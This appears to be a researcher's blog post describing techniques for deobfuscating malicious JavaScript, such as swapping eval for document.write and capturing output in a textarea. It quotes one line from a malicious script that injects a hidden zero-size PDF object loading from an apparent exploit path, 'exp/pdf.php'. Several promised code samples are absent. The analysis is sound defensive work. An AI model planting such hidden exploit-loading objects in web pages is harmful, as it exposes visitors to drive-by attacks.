Here are the common techniques I use to deobfuscate malicious scripts (many thanks to their respective researchers!):
1. Assign eval to a variable
To: var x = eval(code…); document.write(x);
2. Replace document.write() with alert()
3. Replace eval() with document.write()
4. Wrap code with alert()
5. Surround output with textarea
To: <script>document.write(“<textarea cols=50 rows=50>”);code…<document.write(“</textarea>”)</script>
Hackers are hard at work to come up with new ways to defeat anti-virus, spam/web filters, IDS, and even security researchers. As a result, the above tricks sometimes fail to deobfuscate malicious scripts.
Here’s one example:
This script looks for the DIV container which is up at the top and attaches HTML code to it. Here’s the offending code:
document.getElementById(\"pdfplace\").innerHTML = \"<object width=\'0\' height=\'0\' frameborder=\'0\' type=\'application/pdf\' data=\'exp/pdf.php?user=admin&pdf_acces=on\'><param name=\'src\' value=\'1.pdf\'>\";
To get around this, here’s what you can do. Replace this tag:
<textarea id="pdfplace" cols=50 rows=10></textarea>
And here is the result:
Since the malicious script is using getElementById to find “pdfplace”, I add the same ID to the textarea tag to capture the results in the textbox.
Here’s another trick. First, let’s take a look at this example:
If you look carefully around the fifth line from the bottom on the far left, you should see the text, “i.body.appendChild(B);”. This malicious script is attaching a redirection script to the body of the webpage.
So what you can do is right after the above text, simply add the following code:
Here’s what the script will look like after you insert the code:
And here’s the result:
Here’s a variation of the code which allows you to select a specific element from a collection of child nodes; just replace 0 with 1 or whatever:
I’m sure that hackers will come up with other ways to obfuscate their scripts that will bust these two techniques so it’s always good to learn how to reverse scripts manually. But until then, I hope these additional tricks will help you analyze malicious scripts as it has helped me!